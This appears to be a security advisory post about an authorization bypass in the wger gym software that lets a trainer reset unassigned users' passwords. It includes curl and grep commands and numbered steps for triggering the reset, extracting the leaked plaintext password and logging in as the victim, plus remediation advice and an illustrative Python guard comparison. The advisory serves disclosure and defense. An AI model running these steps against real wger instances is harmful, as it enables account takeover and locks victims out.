The vulnerability arises in the `reset_user_password` and `gym_permissions_user_edit` views. The authorization check compares two Django model objects with `!=`, and `None != None` evaluates to False. As a result, when both the attacker (a trainer) and the victim are unassigned to any gym (`gym=None`), the guard is silently bypassed. An authenticated attacker holding the `gym.manage_gym` permission can therefore reset the password of any other unassigned user. The new plaintext password is rendered verbatim in the HTML response, allowing immediate account takeover, and the original password is invalidated, locking the victim out permanently. Five views in total share this vulnerable authorization pattern.
DailyCVE form:
Platform: `wger`
Version: `latest / Django 5.2.13`
Vulnerability: `Authorization bypass`
Severity: `Critical (CVSS 9.9)`
Date: `2026-04-28`
Prediction: `Patch by 2026-05-15`
What Undercode Say:
Check if the vulnerable endpoint is exposed:

```bash
curl -X GET "https://target.example/en/gym/user/2/reset-user-password" \
  -H "Cookie: sessionid=attacker_session"
```

Extract the plaintext password from the response:

```bash
grep -oP '(?<=<th>Password</th><td>)[^<]+' response.html
```

Log in as the victim:

```bash
curl -X POST "https://target.example/en/user/login" \
  -d "username=victim&password=extracted_password&csrfmiddlewaretoken=..."
```
Exploit:
1. Attacker logs in with the `gym.manage_gym` permission and `gym=None`.
2. Attacker sends a GET request to `/en/gym/user//reset-user-password`.
3. Server returns HTTP 200 with the new password in plaintext.
4. Attacker uses the leaked password to log in as the victim, locking them out.
Protection from this CVE:
- Apply the patch that replaces `request.user.userprofile.gym != user.userprofile.gym` with a comparison of the raw foreign keys (the `_id` attributes) and an explicit `is None` guard.
- Avoid relying on Python object semantics for authorization; use integer IDs and explicit null checks.
- Restrict `gym.manage_gym` permission to trusted administrators only until patched.
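The following is an added illustration of the flawed guard described at the top of this post and of the hardened form recommended in the protection steps. It is not wger's code: the `Gym`, `UserProfile` and `User` classes are minimal stand-ins for the Django models, and the `gym_id` property imitates Django's raw foreign-key attribute. Both guard functions return True when the request should be rejected.

```python
from dataclasses import dataclass
from typing import Optional


# Illustrative stand-ins for the Django models, not wger's real models.
@dataclass
class Gym:
    id: int


@dataclass
class UserProfile:
    gym: Optional[Gym]

    @property
    def gym_id(self) -> Optional[int]:
        # Imitates Django's raw foreign-key attribute `<field>_id`.
        return self.gym.id if self.gym is not None else None


@dataclass
class User:
    username: str
    userprofile: UserProfile


def should_deny_vulnerable(request_user: User, target: User) -> bool:
    """Guard in the shape the advisory describes: plain object comparison.

    Because `None != None` is False, a requester with no gym is allowed to
    act on any target with no gym, which is the bypass.
    """
    return request_user.userprofile.gym != target.userprofile.gym


def should_deny_fixed(request_user: User, target: User) -> bool:
    """Hardened guard: explicit `is None` checks plus integer ID comparison.

    A requester without a gym manages nobody, a target without a gym is not
    managed by anyone, and assigned users are compared by raw foreign key.
    """
    manager_gym_id = request_user.userprofile.gym_id
    target_gym_id = target.userprofile.gym_id
    if manager_gym_id is None or target_gym_id is None:
        return True
    return manager_gym_id != target_gym_id


def bypass_demonstrated() -> dict:
    """Run both guards over the scenarios from the advisory (constructed data)."""
    trainer_unassigned = User("trainer", UserProfile(gym=None))
    victim_unassigned = User("victim", UserProfile(gym=None))
    trainer_gym1 = User("trainer1", UserProfile(gym=Gym(1)))
    member_gym1 = User("member1", UserProfile(gym=Gym(1)))
    member_gym2 = User("member2", UserProfile(gym=Gym(2)))
    return {
        # Unassigned trainer vs unassigned victim: vulnerable guard lets it through.
        "unassigned_pair_vulnerable": should_deny_vulnerable(trainer_unassigned, victim_unassigned),
        "unassigned_pair_fixed": should_deny_fixed(trainer_unassigned, victim_unassigned),
        # Same gym: both guards allow, as intended.
        "same_gym_fixed": should_deny_fixed(trainer_gym1, member_gym1),
        # Different gym: both guards deny.
        "other_gym_fixed": should_deny_fixed(trainer_gym1, member_gym2),
    }


if __name__ == "__main__":
    for name, denied in bypass_demonstrated().items():
        print(f"{name}: {'denied' if denied else 'ALLOWED'}")
```

The point of the fixed guard is that the null case is decided explicitly before any comparison happens, so the result no longer depends on how Python compares two `None` values.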
Impact:
- Full account takeover of any unassigned (`gym=None`) user.
- Permanent lockout of the victim (original password invalidated).
- Affects every wger instance where `gym.manage_gym` is delegated and public registration is enabled.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

